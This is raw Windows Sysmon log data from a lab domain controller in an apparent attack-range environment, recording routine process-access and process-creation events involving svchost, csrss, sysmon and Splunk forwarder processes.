15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D24-5FA1-6901-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D24-5FA1-6901-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7D24-5FA1-6901-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.939{D28789B6-7D25-5FA1-6A01-000000008801}8883428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D25-5FA1-6A01-000000008801}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7D25-5FA1-6A01-000000008801}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.814{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D25-5FA1-6A01-000000008801}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:13.815{D28789B6-7D25-5FA1-6A01-000000008801}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.612{D28789B6-7D26-5FA1-6B01-000000008801}22124280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D26-5FA1-6B01-000000008801}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 